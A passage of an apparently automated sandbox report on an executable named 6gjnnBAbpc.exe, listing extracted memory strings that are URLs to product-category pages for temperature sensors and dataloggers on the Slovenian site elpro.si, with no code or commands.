6gjnnBAbpc.exe, 00000000.00000003.330027641.000000000B7D0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.350801707.0000000004F40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.445406802.0000000005B10000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.331596236.0000000004E40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.337281299.0000000004F40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.379732787.0000000004A20000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.330713476.00000000065C0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.338158130.0000000005100000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.elpro.si/kategorija-izdelka/temperaturna-tipala-elpro/high-temp-temperaturna-tipala-za-v
                      Source: 6gjnnBAbpc.exe, 00000000.00000003.520533612.0000000004B20000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.491975144.0000000004E40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.353162006.0000000005100000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.440253994.0000000005B10000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.416873019.0000000004B20000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.370708428.00000000051E0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.335549475.0000000005100000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.524068624.0000000004C30000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.442447060.0000000005B10000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.332478187.0000000004E40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.417313627.0000000004620000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.466436556.0000000000D60000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.444048500.0000000000D60000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.330027641.000000000B7D0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.350801707.0000000004F40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.445406802.0000000005B10000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.331596236.0000000004E40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.337281299.0000000004F40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.379732787.0000000004A20000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.330713476.00000000065C0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.338158130.0000000005100000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.elpro.si/kategorija-izdelka/temperaturna-tipala-elpro/higienska-tipala/
                      Source: 6gjnnBAbpc.exe, 00000000.00000003.334804401.0000000004F40000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.elpro.si/kategorija-izdelka/temperaturna-tipala-elpro/industry-temperaturna-tipala/
                      Source: 6gjnnBAbpc.exe, 00000000.00000003.334804401.0000000004F40000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.elpro.si/kategorija-izdelka/temperaturna-tipala-elpro/industry-temperaturna-tipala/tempe
                      Source: 6gjnnBAbpc.exe, 00000000.00000003.520533612.0000000004B20000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.491975144.0000000004E40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.353162006.0000000005100000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.440253994.0000000005B10000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.416873019.0000000004B20000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.370708428.00000000051E0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.335549475.0000000005100000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.524068624.0000000004C30000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.442447060.0000000005B10000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.332478187.0000000004E40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.417313627.0000000004620000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.466436556.0000000000D60000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.444048500.0000000000D60000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.330027641.000000000B7D0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.350801707.0000000004F40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.445406802.0000000005B10000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.331596236.0000000004E40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.337281299.0000000004F40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.379732787.0000000004A20000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.330713476.00000000065C0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.338158130.0000000005100000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.elpro.si/kategorija-izdelka/temperaturna-tipala-elpro/kanalska-temperaturna-tipala/
                      Source: 6gjnnBAbpc.exe, 00000000.00000003.520533612.0000000004B20000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.491975144.0000000004E40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.353162006.0000000005100000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.440253994.0000000005B10000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.416873019.0000000004B20000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.370708428.00000000051E0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.335549475.0000000005100000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.524068624.0000000004C30000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.442447060.0000000005B10000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.332478187.0000000004E40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.417313627.0000000004620000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.466436556.0000000000D60000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.444048500.0000000000D60000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.330027641.000000000B7D0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.350801707.0000000004F40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.445406802.0000000005B10000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.331596236.0000000004E40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.337281299.0000000004F40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.379732787.0000000004A20000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.330713476.00000000065C0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.338158130.0000000005100000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.elpro.si/kategorija-izdelka/temperaturna-tipala-elpro/nastavljiva-temperaturna-tipala-2/
                      Source: 6gjnnBAbpc.exe, 00000000.00000003.520533612.0000000004B20000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.491975144.0000000004E40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.353162006.0000000005100000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.440253994.0000000005B10000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.416873019.0000000004B20000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.370708428.00000000051E0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.335549475.0000000005100000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.524068624.0000000004C30000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.442447060.0000000005B10000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.332478187.0000000004E40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.417313627.0000000004620000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.466436556.0000000000D60000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.444048500.0000000000D60000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.330027641.000000000B7D0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.350801707.0000000004F40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.445406802.0000000005B10000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.331596236.0000000004E40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.337281299.0000000004F40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.379732787.0000000004A20000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.330713476.00000000065C0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.338158130.0000000005100000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.elpro.si/kategorija-izdelka/temperaturna-tipala-elpro/on-site-cal-temperaturna-tipala/
                      Source: 6gjnnBAbpc.exe, 00000000.00000003.520533612.0000000004B20000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.491975144.0000000004E40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.353162006.0000000005100000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.440253994.0000000005B10000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.416873019.0000000004B20000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.370708428.00000000051E0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.335549475.0000000005100000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.524068624.0000000004C30000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.442447060.0000000005B10000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.332478187.0000000004E40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.417313627.0000000004620000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.466436556.0000000000D60000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.444048500.0000000000D60000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.330027641.000000000B7D0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.350801707.0000000004F40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.445406802.0000000005B10000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.331596236.0000000004E40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.337281299.0000000004F40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.379732787.0000000004A20000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.330713476.00000000065C0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.338158130.0000000005100000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.elpro.si/kategorija-izdelka/temperaturna-tipala-elpro/povrsinska-temperaturna-tipala/
                      Source: 6gjnnBAbpc.exe, 00000000.00000003.520533612.0000000004B20000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.491975144.0000000004E40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.353162006.0000000005100000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.440253994.0000000005B10000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.416873019.0000000004B20000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.370708428.00000000051E0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.335549475.0000000005100000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.524068624.0000000004C30000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.442447060.0000000005B10000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.332478187.0000000004E40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.417313627.0000000004620000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.466436556.0000000000D60000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.444048500.0000000000D60000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.330027641.000000000B7D0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.350801707.0000000004F40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.445406802.0000000005B10000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.331596236.0000000004E40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.337281299.0000000004F40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.379732787.0000000004A20000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.330713476.00000000065C0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.338158130.0000000005100000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.elpro.si/kategorija-izdelka/temperaturna-tipala-elpro/precizna-temperaturna-tipala/
                      Source: 6gjnnBAbpc.exe, 00000000.00000003.520533612.0000000004B20000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.491975144.0000000004E40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.353162006.0000000005100000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.440253994.0000000005B10000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.416873019.0000000004B20000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.370708428.00000000051E0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.335549475.0000000005100000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.524068624.0000000004C30000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.442447060.0000000005B10000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.332478187.0000000004E40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.417313627.0000000004620000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.466436556.0000000000D60000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.444048500.0000000000D60000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.330027641.000000000B7D0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.350801707.0000000004F40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.445406802.0000000005B10000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.331596236.0000000004E40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.337281299.0000000004F40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.379732787.0000000004A20000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.330713476.00000000065C0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.338158130.0000000005100000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.elpro.si/kategorija-izdelka/temperaturna-tipala-elpro/prenosna-temperaturna-tipala/
                      Source: 6gjnnBAbpc.exe, 00000000.00000003.520533612.0000000004B20000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.491975144.0000000004E40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.353162006.0000000005100000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.440253994.0000000005B10000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.416873019.0000000004B20000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.370708428.00000000051E0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.335549475.0000000005100000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.524068624.0000000004C30000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.442447060.0000000005B10000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.332478187.0000000004E40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.417313627.0000000004620000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.466436556.0000000000D60000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.444048500.0000000000D60000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.330027641.000000000B7D0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.350801707.0000000004F40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.445406802.0000000005B10000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.331596236.0000000004E40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.337281299.0000000004F40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.379732787.0000000004A20000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.330713476.00000000065C0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.338158130.0000000005100000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.elpro.si/kategorija-izdelka/temperaturna-tipala-elpro/temperaturna-tipala-predhodna-sifr
                      Source: 6gjnnBAbpc.exe, 00000000.00000003.520533612.0000000004B20000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.491975144.0000000004E40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.353162006.0000000005100000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.440253994.0000000005B10000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.416873019.0000000004B20000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.370708428.00000000051E0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.335549475.0000000005100000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.524068624.0000000004C30000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.442447060.0000000005B10000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.332478187.0000000004E40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.417313627.0000000004620000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.466436556.0000000000D60000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.444048500.0000000000D60000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.330027641.000000000B7D0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.350801707.0000000004F40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.445406802.0000000005B10000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.331596236.0000000004E40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.337281299.0000000004F40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.379732787.0000000004A20000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.330713476.00000000065C0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.338158130.0000000005100000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.elpro.si/kategorija-izdelka/temperaturna-tipala-elpro/wireless-temperaturna-tipala/
                      Source: 6gjnnBAbpc.exe, 00000000.00000003.520533612.0000000004B20000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.491975144.0000000004E40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.353162006.0000000005100000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.440253994.0000000005B10000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.416873019.0000000004B20000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.370708428.00000000051E0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.335549475.0000000005100000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.524068624.0000000004C30000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.442447060.0000000005B10000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.332478187.0000000004E40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.417313627.0000000004620000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.466436556.0000000000D60000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.444048500.0000000000D60000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.330027641.000000000B7D0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.350801707.0000000004F40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.445406802.0000000005B10000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.331596236.0000000004E40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.337281299.0000000004F40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.379732787.0000000004A20000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.330713476.00000000065C0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.338158130.0000000005100000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.elpro.si/kategorija-izdelka/temperaturna-tipala-elpro/zunanja-in-prostorska-temperaturna
                      Source: 6gjnnBAbpc.exe, 00000000.00000003.334804401.0000000004F40000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.elpro.si/kategorija-izdelka/termometri-dataloggerji-ex/
                      Source: 6gjnnBAbpc.exe, 00000000.00000003.334804401.0000000004F40000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.elpro.si/kategorija-izdelka/termometri-dataloggerji-ex/dataloggerji/
                      Source: 6gjnnBAbpc.exe, 00000000.00000003.520533612.0000000004B20000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.491975144.0000000004E40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.353162006.0000000005100000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.440253994.0000000005B10000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.416873019.0000000004B20000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.370708428.00000000051E0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.335549475.0000000005100000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.442447060.0000000005B10000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.332478187.0000000004E40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.417313627.0000000004620000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.466436556.0000000000D60000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.444048500.0000000000D60000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.330027641.000000000B7D0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.350801707.0000000004F40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.445406802.0000000005B10000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.331596236.0000000004E40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.337281299.0000000004F40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.379732787.0000000004A20000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.330713476.00000000065C0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.338158130.0000000005100000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.330942484.0000000004D50000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.elpro.si/kategorija-izdelka/termometri-dataloggerji-ex/dataloggerji/dodatna-oprema-za-da
